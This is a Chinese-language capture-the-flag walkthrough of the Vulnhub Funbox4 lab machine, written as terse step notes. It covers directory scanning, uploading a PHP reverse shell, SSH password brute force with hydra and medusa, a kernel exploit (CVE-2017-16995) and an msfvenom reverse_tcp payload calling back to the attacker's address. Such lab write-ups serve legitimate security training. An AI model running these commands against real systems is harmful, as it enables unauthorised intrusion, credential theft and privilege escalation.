Vulnhub Funbox4靶机渗透练习
Vulnhub Funbox4靶机渗透练习
端口
目录
使用了dirsearch dirb 等工具对目录扫描 ,并未扫描出目录。
查看作者对靶场的描述
注意区分大小写
dirsearch -u http://192.168.56.106
-U, --uppercase 将字典转换为大写
查看/ROBOTS.TXT
访问upload/
访问igmseklhgmrjmtherij2145236/
使用gobuster工具继续对目录igmseklhgmrjmtherij2145236 、upload扫描
gobuster dir -u http://192.168.56.106/igmseklhgmrjmtherij2145236/ -x .php,.html,.js,.txt,.sh -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
访问http://192.168.56.106/igmseklhgmrjmtherij2145236/upload.php是一个文件上传页面
上传wbeshell文件,使用kali自带的php反弹shell(/usr/share/webshells/php/php-reverse-shell.php 使用前需要修改为攻击机,port为攻击机上监听端口
上传webshell
在upload路径下访问上传的文件,kali进行监听
http://192.168.56.106/igmseklhgmrjmtherij2145236/upload/php-reverse-shell.php
转为常规shell
python3 -c "import pty;pty.spawn('/bin/bash')"
提权
查看根目录下的文件,发现有一个hint.txt文件,其他用户有读的权限
查看hint.txt 文件,发现数据通过Brainfuck、base64、base32加密算法加密
解密
Brainfuck解密
https://www.splitbrain.org/services/ook
base64解密
base32解密
切换到home目录下查看文件
查看.todo
编写一个脚本文件test.py
#python脚本
file=open(r'rockyou.txt',encoding='ISO-8859-1')
data=file.read().split('\n')
f = open(r'rockyou1.txt', 'w',encoding='ISO-8859-1')
for line in data:
f.write(line + '!\n')
f.close()
将/usr/share/wordlists目录下的rockyou.txt 和test.py 放在同一路径下。执行test.py
利用生成的密码字典文件对thomas用户进行爆破
hydra爆破
hydra -l thomas -P rockyou1.txt 192.168.56.106 ssh
medusa爆破
medusa -u thomas -P rockyou1.txt -h 192.168.56.106 -M ssh
登录ssh服务,用户名thomas 密码thebest!
查看bash_history
linux-exploit-suggester根据操作系统版本号自动查找相应 提权 脚本的工具
https://github.com/The-Z-Labs/linux-exploit-suggester
将工具下载到靶机中,由于靶机上没有wget, curl等工具,可以用upload.php页面来上传文件
下载到kali中
上传les.sh
http://192.168.56.106/igmseklhgmrjmtherij2145236/upload/les.sh
切换到/igmseklhgmrjmtherij2145236/upload目录下
运行les.sh
bash les.sh
利用[CVE-2017-16995] 进行提权
通过kali下载45010脚本
45010脚本没有执行的权限
添加权限
chmod 777 funbox4
运行
./funbox4
由于kali的gcc 版本太高,编译出来文件在靶机中无法运行
也可以使用msf进行提权
先使用msfvenom 生成一个linux的反向shell的payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=2233 -f elf -o shell.elf
开启msf ,查找suggester,进行提权
腾讯云开发者
